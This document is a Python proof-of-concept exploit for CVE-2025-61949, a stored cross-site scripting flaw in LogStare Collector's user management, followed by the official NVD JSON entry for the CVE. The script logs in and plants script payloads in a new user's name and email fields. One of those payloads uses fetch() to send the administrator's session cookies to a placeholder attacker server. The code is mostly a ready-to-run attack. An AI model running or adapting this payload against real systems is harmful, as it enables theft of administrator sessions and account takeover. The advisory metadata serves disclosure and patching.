CVE-2025-61949

import requests import json # CVE-2025-61949 PoC - LogStare Collector Stored XSS in UserManagement # Target: LogStare Collector UserManagement module TARGET_URL = "http://target-server:8080" USERNAME = "attacker" PASSWORD = "password123" # Malicious XSS payload - steals session cookies XSS_PAYLOAD = '<script>fetch("https://attacker-server/steal?c="+document.cookie)</script>' def exploit_stored_xss(): """ This PoC demonstrates how to exploit the stored XSS vulnerability in LogStare Collector's UserManagement functionality. Steps: 1. Authenticate to the application 2. Create a new user with XSS payload in user information fields 3. When admin views user list, XSS will be executed """ # Step 1: Login to get authentication token login_url = f"{TARGET_URL}/api/auth/login" login_data = { "username": USERNAME, "password": PASSWORD } session = requests.Session() response = session.post(login_url, json=login_data) if response.status_code != 200: print(f"[-] Login failed: {response.status_code}") return False token = response.json().get('token') headers = {'Authorization': f'Bearer {token}'} # Step 2: Create user with XSS payload create_user_url = f"{TARGET_URL}/api/users" user_data = { "username": "malicious_user", "email": f"<script>alert('XSS')</script>@example.com", "full_name": XSS_PAYLOAD, "role": "user" } response = session.post(create_user_url, json=user_data, headers=headers) if response.status_code in [200, 201]: print("[+] Malicious user created successfully") print(f"[+] Payload stored: {XSS_PAYLOAD}") print("[*] When admin views user list, the XSS will execute") return True else: print(f"[-] Failed to create user: {response.status_code}") return False if __name__ == "__main__": exploit_stored_xss()

{"cve": {"id": "CVE-2025-61949", "sourceIdentifier": "[email protected]", "published": "2025-11-21T07:15:54.273", "lastModified": "2025-12-05T15:34:16.920", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LogStare Collector contains a stored cross-site scripting vulnerability in UserManagement. If crafted user information is stored, an arbitrary script may be executed on the web browser of the user who logs in to the product's management page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:secuavail:logstare_collector:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.2", "matchCriteriaId": "074556F9-0A35-4E1F-AF34-ADC3A9503B75"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN77560819/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.logstare.com/vulnerability/2025-001/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}